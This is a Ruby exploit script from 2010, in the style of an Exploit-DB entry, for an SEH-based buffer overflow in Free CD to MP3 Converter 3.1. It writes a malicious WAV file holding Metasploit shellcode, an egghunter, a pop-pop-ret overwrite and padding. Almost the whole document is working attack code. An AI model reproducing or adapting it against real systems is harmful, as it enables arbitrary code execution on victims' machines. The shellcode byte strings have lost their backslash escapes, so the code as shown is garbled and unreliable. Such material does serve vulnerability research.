# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (SEH)
# Date: 10/18/10
# Credit/Bug found by: C4SS!0 G0M3S
# Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe
# Version: 3.1
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
 
#! /usr/bin/env ruby
filename = 'crash.wav'

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = ''
shellcode <<  "xdbxc0x31xc9xbfx7cx16x70xcc"
shellcode << "xd9x74x24xf4xb1x1ex58x31x78"
shellcode << "x18x83xe8xfcx03x78x68xf4x85"
shellcode << "x30x78xbcx65xc9x78xb6x23xf5"
shellcode << "xf3xb4xaex7dx02xaax3ax32x1c"
shellcode << "xbfx62xedx1dx54xd5x66x29x21"
shellcode << "xe7x96x60xf5x71xcax06x35xf5"
shellcode << "x14xc7x7cxfbx1bx05x6bxf0x27"
shellcode << "xddx48xfdx22x38x1bxa2xe8xc3"
shellcode << "xf7x3bx7axcfx4cx4fx23xd3x53"
shellcode << "xa4x57xf7xd8x3bx83x8ex83x1f"
shellcode << "x57x53x64x51xa1x33xcdxf5xc6"
shellcode << "xf5xc1x7ex98xf5xaaxf1x05xa8"
shellcode << "x26x99x3dx3bxc0xd9xfex51x61"
shellcode << "xb6x0ex2fx85x19x87xb7x78x2f"
shellcode << "x59x90x7bxd7x05x7fxe8x7bxca"

egghunter = ''
egghunter << "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
egghunter << "x77x30x30x74"
egghunter << "x8BxFAxAFx75xEAxAFx75xE7xFFxE7"

junk1	= 'A' * 4156
nseh	= [0x06eb9090].pack('V') # jmp short 6 byte
seh		= [0x00409F8C].pack('V') # cdextract.exe
nops	= "x90" * 50
junk2	= 'B' * (10000 - (junk1 + nseh + seh + nops + egghunter + nops + "w00tw00t" + shellcode).length)

# [junk1 'A'][nseh - short jmp)][seh -pop pop ret][nops][egghunter][nops]['w00tw00t'][shellcode][junk2 'B']
#              (2)|   ^___________________|(1)      ^(3)--> (4)         (5)Tag found!--> (6)   
#                 |_________________________________|

xploit	= junk1 + nseh + seh + nops + egghunter + nops + "w00tw00t" + shellcode + junk2

File.open(filename,'w') do |fd|
	fd.write xploit
	puts "xploit file size : #{xploit.length.to_s}"
end